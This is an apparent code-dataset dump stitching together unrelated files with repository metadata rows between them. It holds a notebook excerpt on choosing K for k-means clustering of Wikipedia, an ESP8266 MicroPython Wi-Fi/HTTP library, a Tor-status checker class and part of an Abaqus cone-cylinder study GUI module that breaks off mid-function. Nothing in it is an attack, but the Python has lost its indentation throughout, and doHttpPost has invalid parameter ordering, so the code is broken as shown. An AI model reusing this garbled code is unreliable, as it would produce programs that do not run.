# Looking at the representative examples and top words, we classify each cluster as follows. Notice the bolded items, which indicate the appearance of a new theme.
# * Cluster 0: **lawyers, judges, legal scholars**
# * Cluster 1: **professors, researchers, scholars (natural and health sciences)**
# * Cluster 2: ice hockey players
# * Cluster 3: politicans
# * Cluster 4: **government officials**
# * Cluster 5: politicans
# * Cluster 6: **professors, researchers, scholars (social sciences and humanities)**
# * Cluster 7: Canadian politicians
# * Cluster 8: **car racers**
# * Cluster 9: **economists**
# * Cluster 10: track and field athletes
# * Cluster 11: females from various fields
# * Cluster 12: (mixed; no clear theme)
# * Cluster 13: baseball players
# * Cluster 14: **painters, sculptors, artists**
# * Cluster 15: Austrailian rules football players, American football players
# * Cluster 16: **musicians, composers**
# * Cluster 17: soccer (association football) players, rugby players
# * Cluster 18: **poets**
# * Cluster 19: **film directors, playwrights**
# * Cluster 20: **songwriters, singers, music producers**
# * Cluster 21: **generals of U.S. Air Force**
# * Cluster 22: **music directors, conductors**
# * Cluster 23: **basketball players**
# * Cluster 24: **golf players**
#
# Indeed, increasing K achieved the desired effect of breaking up large clusters. Depending on the application, this may or may not be preferable to the K=10 analysis.
#
# Let's take it to the extreme and set K=100. We have a suspicion that this value is too large. Let us look at the top words from each cluster:
# In[53]:
k=100
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k,
map_index_to_word, display_content=False)
# turn off text for brevity -- turn it on if you are curious ;)
# The class of soccer (association football) players has been broken into two clusters (44 and 45). Same goes for Austrialian rules football players (clusters 26 and 48). The class of baseball players have been also broken into two clusters (16 and 91).
#
# **A high value of K encourages pure clusters, but we cannot keep increasing K. For large enough K, related documents end up going to different clusters.**
#
# That said, the result for K=100 is not entirely bad. After all, it gives us separate clusters for such categories as Brazil, wrestling, computer science and the Mormon Church. If we set K somewhere between 25 and 100, we should be able to avoid breaking up clusters while discovering new ones.
#
# Also, we should ask ourselves how much **granularity** we want in our clustering. If we wanted a rough sketch of Wikipedia, we don't want too detailed clusters. On the other hand, having many clusters can be valuable when we are zooming into a certain part of Wikipedia.
#
# **There is no golden rule for choosing K. It all depends on the particular application and domain we are in.**
#
# Another heuristic people use that does not rely on so much visualization, which can be hard in many applications (including here!) is as follows. Track heterogeneity versus K and look for the "elbow" of the curve where the heterogeneity decrease rapidly before this value of K, but then only gradually for larger values of K. This naturally trades off between trying to minimize heterogeneity, but reduce model complexity. In the heterogeneity versus K plot made above, we did not yet really see a flattening out of the heterogeneity, which might indicate that indeed K=100 is "reasonable" and we only see real overfitting for larger values of K (which are even harder to visualize using the methods we attempted above.)
# **Quiz Question**. Another sign of too large K is having lots of small clusters. Look at the distribution of cluster sizes (by number of member data points). How many of the 100 clusters have fewer than 236 articles, i.e. 0.4% of the dataset?
#
# Hint: Use `cluster_assignment[100]()`, with the extra pair of parentheses for delayed loading.
# In[55]:
temp = cluster_assignment[100]()
count = 0
for i in range(100):
total = (temp == i).sum()
if total < 236:
count += 1
print count
# ### Takeaway
#
# Keep in mind though that tiny clusters aren't necessarily bad. A tiny cluster of documents that really look like each others is definitely preferable to a medium-sized cluster of documents with mixed content. However, having too few articles in a cluster may cause overfitting by reading too much into a limited pool of training data.
| 46.01873 | 725 | 0.707195 | 6,622 | 44,224 | 4.665811 | 0.166264 | 0.036864 | 0.011781 | 0.003625 | 0.221187 | 0.18361 | 0.162443 | 0.125935 | 0.109525 | 0.088326 | 0 | 0.022978 | 0.198964 | 44,224 | 960 | 726 | 46.066667 | 0.849203 | 0.64214 | 0 | 0.271375 | 0 | 0.003717 | 0.079207 | 0.015031 | 0 | 0 | 0 | 0.001042 | 0.007435 | 0 | null | null | 0.018587 | 0.040892 | null | null | 0.104089 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d316a1c92ea2eacd99036644096b71daf8954435 | 18,504 | py | Python | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 8 | 2021-12-30T18:31:26.000Z | 2022-03-22T01:11:29.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 1 | 2021-11-06T22:54:47.000Z | 2021-12-29T03:28:18.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 6 | 2021-09-28T06:35:59.000Z | 2022-01-10T10:36:41.000Z | from machine import UART, Pin
import time
from httpParser import HttpParser
ESP8266_OK_STATUS = "OK\r\n"
ESP8266_ERROR_STATUS = "ERROR\r\n"
ESP8266_FAIL_STATUS = "FAIL\r\n"
ESP8266_WIFI_CONNECTED="WIFI CONNECTED\r\n"
ESP8266_WIFI_GOT_IP_CONNECTED="WIFI GOT IP\r\n"
ESP8266_WIFI_DISCONNECTED="WIFI DISCONNECT\r\n"
ESP8266_WIFI_AP_NOT_PRESENT="WIFI AP NOT FOUND\r\n"
ESP8266_WIFI_AP_WRONG_PWD="WIFI AP WRONG PASSWORD\r\n"
ESP8266_BUSY_STATUS="busy p...\r\n"
UART_Tx_BUFFER_LENGTH = 1024
UART_Rx_BUFFER_LENGTH = 1024*2
class ESP8266:
"""
This is a class for access ESP8266 using AT commands
Using this class, you access WiFi and do HTTP Post/Get operations.
Attributes:
uartPort (int): The Uart port numbet of the RPI Pico's UART BUS [Default UART0]
baudRate (int): UART Baud-Rate for communncating between RPI Pico's & ESP8266 [Default 115200]
txPin (init): RPI Pico's Tx pin [Default Pin 0]
rxPin (init): RPI Pico's Rx pin [Default Pin 1]
"""
__rxData=None
__txData=None
__httpResponse=None
def __init__(self, uartPort=0 ,baudRate=115200, txPin=(0), rxPin=(1)):
"""
The constaructor for ESP8266 class
Parameters:
uartPort (int): The Uart port numbet of the RPI Pico's UART BUS [Default UART0]
baudRate (int): UART Baud-Rate for communncating between RPI Pico's & ESP8266 [Default 115200]
txPin (init): RPI Pico's Tx pin [Default Pin 0]
rxPin (init): RPI Pico's Rx pin [Default Pin 1]
"""
self.__uartPort=uartPort
self.__baudRate=baudRate
self.__txPin=txPin
self.__rxPin=rxPin
#print(self.__uartPort, self.__baudRate, self.__txPin, self.__rxPin)
self.__uartObj = UART(self.__uartPort, baudrate=self.__baudRate, tx=Pin(self.__txPin), rx=Pin(self.__rxPin), txbuf=UART_Tx_BUFFER_LENGTH, rxbuf=UART_Rx_BUFFER_LENGTH)
#print(self.__uartObj)
def _createHTTPParseObj(self):
"""
This is private function for create HTTP response every time
before doing the HTTP Post/Get operation
"""
if(self.__httpResponse != None):
del self.__httpResponse
self.__httpResponse=HttpParser()
else:
#del self.__httpResponse
self.__httpResponse=HttpParser()
def _sendToESP8266(self, atCMD, delay=1):
"""
This is private function for complete ESP8266 AT command Send/Receive operation.
"""
self.__rxData=str()
self.__txData=atCMD
#print("---------------------------"+self.__txData)
self.__uartObj.write(self.__txData)
self.__rxData=bytes()
time.sleep(delay)
#while self.__uartObj.any()>0:
# self.__rxData += self.__uartObj.read(1)
while True:
#print(".")
if self.__uartObj.any()>0:
#print(self.__uartObj.any())
break
while self.__uartObj.any()>0:
self.__rxData += self.__uartObj.read(UART_Rx_BUFFER_LENGTH)
#print(self.__rxData)
if ESP8266_OK_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_ERROR_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_FAIL_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_BUSY_STATUS in self.__rxData:
return "ESP BUSY\r\n"
else:
return None
def startUP(self):
"""
This funtion use to check the communication between ESP8266 & RPI Pico
Return:
True if communication success with the ESP8266
False if unable to communication with the ESP8266
"""
retData = self._sendToESP8266("AT\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
False
def reStart(self):
"""
This funtion use to Reset the ESP8266
Return:
True if Reset successfully done with the ESP8266
False if unable to reset the ESP8266
"""
retData = self._sendToESP8266("AT+RST\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
time.sleep(5)
#self.startUP()
return self.startUP()
else:
return False
else:
False
def echoING(self, enable=False):
"""
This function use to enable/diable AT command echo [Default set as false for diable Echo]
Return:
True if echo off/on command succefully initiate with the ESP8266
False if echo off/on command failed to initiate with the ESP8266
"""
if enable==False:
retData = self._sendToESP8266("ATE0\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
else:
retData = self._sendToESP8266("ATE1\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getVersion(self):
"""
This function use to get AT command Version details
Return:
Version details on success else None
"""
retData = self._sendToESP8266("AT+GMR\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
#print(str(retData,"utf-8"))
retData = str(retData).partition(r"OK")[0]
#print(str(retData,"utf-8"))
retData = retData.split(r"\r\n")
retData[0] = retData[0].replace("b'","")
retData=str(retData[0]+"\r\n"+retData[1]+"\r\n"+retData[2])
return retData
else:
return None
else:
return None
def reStore(self):
"""
This function use to reset the ESP8266 into the Factory reset mode & delete previous configurations
Return:
True on ESP8266 restore succesfully
False on failed to restore ESP8266
"""
retData = self._sendToESP8266("AT+RESTORE\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return None
"""
def chcekSYSRAM(self):
#retData = self._sendToESP8266("AT+SYSRAM?\r\n")
self.__rxData=b''
self.__txData="AT+SYSRAM?\r\n"
self.__uartObj.write(self.__txData)
self.__rxData=bytes()
time.sleep(2)
while self.__uartObj.any()>0:
self.__rxData += self.__uartObj.read(1)
print(self.__rxData.decode())
if ESP8266_OK_STATUS in self.__rxData:
return self.__rxData
else:
return 1
"""
def getCurrentWiFiMode(self):
"""
This fucntion use to query ESP8266 WiFi's current mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Return:
STA if ESP8266's wifi's current mode pre-config as Station
SoftAP if ESP8266's wifi's current mode pre-config as SoftAP
SoftAP+STA if ESP8266's wifi's current mode set pre-config Station & SoftAP
None failed to detect the wifi's current pre-config mode
"""
retData = self._sendToESP8266("AT+CWMODE_CUR?\r\n")
if(retData != None):
if "1" in retData:
return "STA"
elif "2" in retData:
return "SoftAP"
elif "3" in retData:
return "SoftAP+STA"
else:
return None
else:
return None
def setCurrentWiFiMode(self, mode=3):
"""
This fucntion use to set ESP8266 WiFi's current mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Parameter:
mode (int): ESP8266 WiFi's [ 1: STA, 2: SoftAP, 3: SoftAP+STA(default)]
Return:
True on successfully set the current wifi mode
False on failed set the current wifi mode
"""
txData="AT+CWMODE_CUR="+str(mode)+"\r\n"
retData = self._sendToESP8266(txData)
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getDefaultWiFiMode(self):
"""
This fucntion use to query ESP8266 WiFi's default mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Return:
STA if ESP8266's wifi's default mode pre-config as Station
SoftAP if ESP8266's wifi's default mode pre-config as SoftAP
SoftAP+STA if ESP8266's wifi's default mode set pre-config Station & SoftAP
None failed to detect the wifi's default pre-config mode
"""
retData = self._sendToESP8266("AT+CWMODE_DEF?\r\n")
if(retData!=None):
if "1" in retData:
return "STA"
elif "2" in retData:
return "SoftAP"
elif "3" in retData:
return "SoftAP+STA"
else:
return None
else:
return None
def setDefaultWiFiMode(self, mode=3):
"""
This fucntion use to set ESP8266 WiFi's default mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Parameter:
mode (int): ESP8266 WiFi's [ 1: STA, 2: SoftAP, 3: SoftAP+STA(default)]
Return:
True on successfully set the default wifi mode
False on failed set the default wifi mode
"""
txData="AT+CWMODE_DEF="+str(mode)+"\r\n"
retData = self._sendToESP8266(txData)
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getAvailableAPs(self):
"""
This fucntion use to query ESP8266 for available WiFi AccessPoins
Retuns:
List of Available APs or None
"""
retData = str(self._sendToESP8266("AT+CWLAP\r\n", delay=10))
if(retData != None):
retData = retData.replace("+CWLAP:", "")
retData = retData.replace(r"\r\n\r\nOK\r\n", "")
retData = retData.replace(r"\r\n","@")
retData = retData.replace("b'(","(").replace("'","")
retData = retData.split("@")
retData =list(retData)
apLists=list()
for items in retData:
data=str(items).replace("(","").replace(")","").split(",")
data=tuple(data)
apLists.append(data)
return apLists
else:
return None
def connectWiFi(self,ssid,pwd):
"""
This fucntion use to connect ESP8266 with a WiFi AccessPoins
Parameters:
ssid : WiFi AP's SSID
pwd : WiFi AP's Password
Retuns:
WIFI DISCONNECT when ESP8266 failed connect with target AP's credential
WIFI AP WRONG PASSWORD when ESP8266 tried connect with taget AP with wrong password
WIFI AP NOT FOUND when ESP8266 cann't find the target AP
WIFI CONNECTED when ESP8266 successfully connect with the target AP
"""
txData="AT+CWJAP_CUR="+'"'+ssid+'"'+','+'"'+pwd+'"'+"\r\n"
#print(txData)
retData = self._sendToESP8266(txData, delay=15)
#print(".....")
#print(retData)
if(retData!=None):
if "+CWJAP" in retData:
if "1" in retData:
return ESP8266_WIFI_DISCONNECTED
elif "2" in retData:
return ESP8266_WIFI_AP_WRONG_PWD
elif "3" in retData:
return ESP8266_WIFI_AP_NOT_PRESENT
elif "4" in retData:
return ESP8266_WIFI_DISCONNECTED
else:
return None
elif ESP8266_WIFI_CONNECTED in retData:
if ESP8266_WIFI_GOT_IP_CONNECTED in retData:
return ESP8266_WIFI_CONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
def disconnectWiFi(self):
"""
This fucntion use to disconnect ESP8266 with a connected WiFi AccessPoins
Return:
False on failed to disconnect the WiFi
True on successfully disconnected
"""
retData = self._sendToESP8266("AT+CWQAP\r\n")
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def _createTCPConnection(self, link, port=80):
"""
This fucntion use to create connect between ESP8266 and Host.
Just like create a socket before complete the HTTP Get/Post operation.
Return:
False on failed to create a socket connection
True on successfully create and establish a socket connection.
"""
#self._sendToESP8266("AT+CIPMUX=0")
txData="AT+CIPSTART="+'"'+"TCP"+'"'+','+'"'+link+'"'+','+str(port)+"\r\n"
#print(txData)
retData = self._sendToESP8266(txData)
#print(".....")
#print(retData)
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
False
def doHttpGet(self,host,path,user_agent="RPi-Pico", port=80):
"""
This fucntion use to complete a HTTP Get operation
Parameter:
host (str): Host URL [ex: get operation URL: www.httpbin.org/ip. so, Host URL only "www.httpbin.org"]
path (str): Get operation's URL path [ex: get operation URL: www.httpbin.org/ip. so, the path "/ip"]
user-agent (str): User Agent Name [Default "RPi-Pico"]
post (int): HTTP post number [Default port number 80]
Return:
HTTP error code & HTTP response[If error not equal to 200 then the response is None]
On failed return 0 and None
"""
if(self._createTCPConnection(host, port) == True):
self._createHTTPParseObj()
#getHeader="GET "+path+" HTTP/1.1\r\n"+"Host: "+host+":"+str(port)+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"\r\n";
getHeader="GET "+path+" HTTP/1.1\r\n"+"Host: "+host+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"\r\n";
#print(getHeader,len(getHeader))
txData="AT+CIPSEND="+str(len(getHeader))+"\r\n"
retData = self._sendToESP8266(txData)
if(retData != None):
if ">" in retData:
retData = self._sendToESP8266(getHeader, delay=2)
self._sendToESP8266("AT+CIPCLOSE\r\n")
retData=self.__httpResponse.parseHTTP(retData)
return retData, self.__httpResponse.getHTTPResponse()
else:
return 0, None
else:
return 0, None
else:
self._sendToESP8266("AT+CIPCLOSE\r\n")
return 0, None
def doHttpPost(self,host,path,user_agent="RPi-Pico",content_type,content,port=80):
"""
This fucntion use to complete a HTTP Post operation
Parameter:
host (str): Host URL [ex: get operation URL: www.httpbin.org/ip. so, Host URL only "www.httpbin.org"]
path (str): Get operation's URL path [ex: get operation URL: www.httpbin.org/ip. so, the path "/ip"]
user-agent (str): User Agent Name [Default "RPi-Pico"]
content_type (str): Post operation's upload content type [ex. "application/json", "application/x-www-form-urlencoded", "text/plain"
content (str): Post operation's upload content
post (int): HTTP post number [Default port number 80]
Return:
HTTP error code & HTTP response[If error not equal to 200 then the response is None]
On failed return 0 and None
"""
if(self._createTCPConnection(host, port) == True):
self._createHTTPParseObj()
postHeader="POST "+path+" HTTP/1.1\r\n"+"Host: "+host+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"Content-Type: "+content_type+"\r\n"+"Content-Length: "+str(len(content))+"\r\n"+"\r\n"+content+"\r\n";
#print(postHeader,len(postHeader))
txData="AT+CIPSEND="+str(len(postHeader))+"\r\n"
retData = self._sendToESP8266(txData)
if(retData != None):
if ">" in retData:
retData = self._sendToESP8266(postHeader, delay=2)
#print(".......@@",retData)
self._sendToESP8266("AT+CIPCLOSE\r\n")
#print(self.__httpResponse)
retData=self.__httpResponse.parseHTTP(retData)
return retData, self.__httpResponse.getHTTPResponse()
else:
return 0, None
else:
return 0, None
else:
self._sendToESP8266("AT+CIPCLOSE\r\n")
return 0, None
def __del__(self):
"""
The distaructor for ESP8266 class
"""
print('Destructor called, ESP8266 deleted.')
pass
| 36.497041 | 209 | 0.541829 | 2,084 | 18,504 | 4.682822 | 0.130998 | 0.010862 | 0.046726 | 0.023056 | 0.626294 | 0.559586 | 0.49544 | 0.466646 | 0.447177 | 0.424121 | 0 | 0.04262 | 0.362192 | 18,504 | 507 | 210 | 36.497041 | 0.784274 | 0.039721 | 0 | 0.577519 | 0 | 0 | 0.069619 | 0 | 0.015504 | 0 | 0 | 0 | 0 | 0 | null | null | 0.007752 | 0.011628 | null | null | 0.003876 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d31d05d65e96e8eb5e6db72874f6fcc4ab556220 | 2,325 | py | Python | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | 1 | 2021-11-09T02:38:38.000Z | 2021-11-09T02:38:38.000Z | http/torcheck.py | k11dd00/oniongen | 00d7992920c59de4a5584357a35494fbdde0a6d9 | [
"MIT"
] | null | null | null | # MIT License
#
# Copyright (c) 2018 k1dd00
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
import urllib2
from BeautifulSoup import BeautifulSOAP
class TorCheck(object):
"""
The TorCheck class.
This class checks the tor status and ip address
"""
IP_CHECK_ENDPOINT = "http://icanhazip.com"
TOR_CHECK_ENDPOINT = "https://check.torproject.org"
def __init__(self):
self.text_key = "congratulations"
def check_ip(self):
"""
Checks the ip address
Returns
-------
ip: str
The ip address
"""
request = urllib2.urlopen(self.IP_CHECK_ENDPOINT)
response = request.read()
return response.strip()
def check_tor_status(self):
"""
Checks the tor status
Returns
-------
status: Bool
The tor status
"""
html = urllib2.urlopen(self.TOR_CHECK_ENDPOINT).read()
parsed_html = BeautifulSOAP(html)
content = parsed_html.body.find('h1', attrs={'class':'not'}).text
return self.text_key in content.lower()
| 32.746479 | 81 | 0.68086 | 309 | 2,325 | 5.061489 | 0.521036 | 0.056266 | 0.023018 | 0.023018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017988 | 0.234839 | 2,325 | 70 | 82 | 33.214286 | 0.861158 | 0.619785 | 0 | 0 | 0 | 0 | 0.099863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0 | 0.125 | 0 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d322e920e430d42433aea1129d02e77e626557b0 | 21,922 | py | Python | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-22T22:15:24.000Z | 2020-10-22T22:15:24.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 1 | 2020-10-09T12:42:02.000Z | 2020-10-09T12:42:02.000Z | desicos/abaqus/gui/gui_commands.py | saullocastro/desicos | 922db8ac4fb0fb4d09df18ce2a14011f207f6fa8 | [
"BSD-3-Clause"
] | 2 | 2020-07-14T07:45:31.000Z | 2020-12-29T00:22:41.000Z | import os
import subprocess
import shutil
from itertools import chain
import __main__
import numpy as np
import desicos.abaqus.abaqus_functions as abaqus_functions
import desicos.conecylDB as conecylDB
import desicos.abaqus.conecyl as conecyl
import desicos.abaqus.study as study
from desicos.abaqus.constants import TMP_DIR
from desicos.conecylDB import fetch, save
ccattrs = ['rbot','H','alphadeg','plyts',
'stack', 'numel_r', 'elem_type',
'separate_load_steps', 'displ_controlled',
'axial_displ', 'axial_load', 'axial_step',
'pressure_load', 'pressure_step',
#'Nxxtop', 'Nxxtop_vec',
'damping_factor1', 'minInc1', 'initialInc1', 'maxInc1', 'maxNumInc1',
'damping_factor2', 'minInc2', 'initialInc2', 'maxInc2', 'maxNumInc2',
'bc_fix_bottom_uR', 'bc_fix_bottom_v', 'bc_bottom_clamped',
'bc_fix_bottom_side_uR', 'bc_fix_bottom_side_v', 'bc_fix_bottom_side_u3',
'bc_fix_top_uR', 'bc_fix_top_v', 'bc_top_clamped',
'bc_fix_top_side_uR', 'bc_fix_top_side_v', 'bc_fix_top_side_u3',
'resin_add_BIR', 'resin_add_BOR', 'resin_add_TIR', 'resin_add_TOR',
'use_DLR_bc',
'resin_E', 'resin_nu', 'resin_numel',
'resin_bot_h', 'resin_bir_w1', 'resin_bir_w2', 'resin_bor_w1', 'resin_bor_w2',
'resin_top_h', 'resin_tir_w1', 'resin_tir_w2', 'resin_tor_w1', 'resin_tor_w2',
'laminapropKeys', 'allowables', 'timeInterval', 'stress_output']
def find_std_name(std_name):
#
#TODO: avoid using try and except... how to find if .stds exists inside
# __main__
try:
if std_name in __main__.stds.keys():
pass
except:
__main__.stds = {}
return std_name
def command_wrapper(cmd):
# Decorator function to provide error tracebacks from commands
def new_cmd(*args, **kwargs):
try:
cmd(*args, **kwargs)
except Exception, e:
import traceback
traceback.print_exc()
raise
return new_cmd
@command_wrapper
def apply_imp_ms(
std_name,
imp_ms,
imp_ms_stretch_H,
imp_ms_scalings,
imp_r_TOL,
imp_ms_ncp,
imp_ms_power_parameter,
imp_ms_theta_z_format,
imp_ms_rotatedeg,
):
std = __main__.stds[std_name]
start = 0
if std.calc_Pcr:
start = 1
# The nodal_translations stores the first search to save time
# it starts with None
nodal_translations = None
for i, scaling_factor in enumerate(imp_ms_scalings):
scaling_factor = scaling_factor[0]
if scaling_factor:
cc = std.ccs[i+start]
msi = cc.impconf.add_msi(
imp_ms=imp_ms,
scaling_factor=scaling_factor,
rotatedeg=imp_ms_rotatedeg,
)
cc.impconf.rebuild()
msi.stretch_H = imp_ms_stretch_H
msi.use_theta_z_format = imp_ms_theta_z_format
msi.r_TOL = imp_r_TOL
msi.ncp = imp_ms_ncp
msi.power_parameter = imp_ms_power_parameter
msi.nodal_translations = nodal_translations
nodal_translations = msi.create()
@command_wrapper
def apply_imp_t(
std_name,
imp_thick,
imp_num_sets,
imp_t_stretch_H,
imp_t_scalings,
imp_t_ncp,
imp_t_power_parameter,
imp_t_theta_z_format,
imp_t_rotatedeg):
std = __main__.stds[std_name]
start = 0
if std.calc_Pcr:
start = 1
# The nodal_translations stores the first search to save time
# it starts with None
elems_t = None
t_set = None
for i,scaling_factor in enumerate(imp_t_scalings):
scaling_factor = scaling_factor[0]
if scaling_factor:
cc = std.ccs[i+start]
ti = cc.impconf.add_ti(imp_thick, scaling_factor)
cc.impconf.rebuild()
ti.number_of_sets = imp_num_sets
ti.stretch_H = imp_t_stretch_H
ti.use_theta_z_format = imp_t_theta_z_format
ti.ncp = imp_t_ncp
ti.power_parameter = imp_t_power_parameter
ti.elems_t = elems_t
ti.t_set = t_set
elems_t, t_set = ti.create()
def create_study(**kwargs):
# setting defaults
pl_table = kwargs.get('pl_table')
cb_table = kwargs.get('cb_table')
pload_step = kwargs.get('pload_step')
d_table = kwargs.get('d_table')
ax_table = kwargs.get('ax_table')
lbmi_table = kwargs.get('lbmi_table')
cut_table = kwargs.get('cut_table')
ppi_enabled = kwargs.get('ppi_enabled')
ppi_extra_height = kwargs.get('ppi_extra_height')
ppi_table = kwargs.get('ppi_table')
ffi_scalings = kwargs.get('ffi_scalings')
while len(ffi_scalings) > 0 and ffi_scalings[-1] in [(0, False), False]:
ffi_scalings = ffi_scalings[:-1]
betadeg = kwargs.get('betadeg', 0.)
omegadeg = kwargs.get('omegadeg', 0.)
betadegs = kwargs.get('betadegs')
omegadegs = kwargs.get('omegadegs')
imp_num = {}
imp_num['pl'] = kwargs.get('pl_num')
imp_num['cbi'] = kwargs.get('cb_num')
imp_num['d'] = kwargs.get('d_num')
imp_num['ax'] = kwargs.get('ax_num')
imp_num['lbmi'] = kwargs.get('lbmi_num')
imp_num['cut'] = kwargs.get('cut_num')
imp_tables = {}
imp_tables['pl'] = pl_table
imp_tables['cbi'] = cb_table
imp_tables['d'] = d_table
imp_tables['ax'] = ax_table
imp_tables['lbmi'] = lbmi_table
imp_tables['cut'] = cut_table
num_params = {}
num_params['pl'] = 2
num_params['cbi'] = 2
num_params['d'] = 4
num_params['ax'] = 2
num_params['lbmi'] = 1
num_params['cut'] = 3
num_models = 1
for k in ['pl', 'cbi', 'd', 'ax', 'lbmi', 'cut']:
if imp_num[k] == 0:
continue
imp_table = imp_tables[k]
num_models = max(num_models, len(imp_table)-(num_params[k]+1))
num_models = max(num_models, len(ffi_scalings))
#
# Cleaning up input values
#
# laminate
laminate = np.atleast_2d([i for i in kwargs.get('laminate') if i])
kwargs['laminate'] = laminate
kwargs['stack'] = [float(i) for i in laminate[:,2] if i != '']
stack = kwargs['stack']
kwargs['laminapropKeys'] = [i if i != '' else laminate[0,0]
for i in laminate[:len(stack),0]]
kwargs['plyts'] = [float(i) if i != '' else float(laminate[0,1])
for i in laminate[:len(stack),1]]
#TODO currently only one allowable is allowed for stress analysis
kwargs['allowables'] = [kwargs['allowables'] for _ in stack]
#allowablesKeys = [float(i) if i != '' else laminate[0,3] \
# for i in laminate[:len(stack),1]]
#
# load asymmetry
#
#TODO list comprehension for these guys below
la = kwargs.get('la')
if la == 0:
betadegs = []
omegadegs = []
elif la == 1:
betadegs = [betadeg for i in range(num_models)]
omegadegs = [omegadeg for i in range(num_models)]
elif la == 2:
if betadegs is not None:
new_betadegs = []
for betadeg in betadegs:
if betadeg:
new_betadegs.append(betadeg[0])
betadegs = new_betadegs
else:
betadegs = []
if omegadegs is not None:
new_omegadegs = []
for omegadeg in omegadegs:
if omegadeg:
new_omegadegs.append(omegadeg[0])
omegadegs = new_omegadegs
else:
omegadegs = []
num_models = max(num_models, len(betadegs), len(omegadegs))
#
# damping
#
if not kwargs['artificial_damping1']:
kwargs['damping_factor1'] = None
if not kwargs['artificial_damping2']:
kwargs['damping_factor2'] = None
#
std_name = find_std_name(kwargs.get('std_name'))
#
dirname = os.path.join(TMP_DIR, std_name, 'outputs')
if not os.path.isdir(dirname):
os.makedirs(dirname)
#
#
std = study.Study()
__main__.stds[std_name] = std
std.name = std_name
std.rebuild()
for cc in std.ccs:
cc.rebuilt = False
cc.created_model = False
for i in range(1, num_models+1):
cc = conecyl.ConeCyl()
for attr in ccattrs:
setattr(cc, attr, kwargs[attr])
# adding load asymmetry
i_model = i-1
if i_model < len(betadegs):
cc.betadeg = betadegs[i_model]
if i_model < len(omegadegs):
cc.omegadeg = omegadegs[i_model]
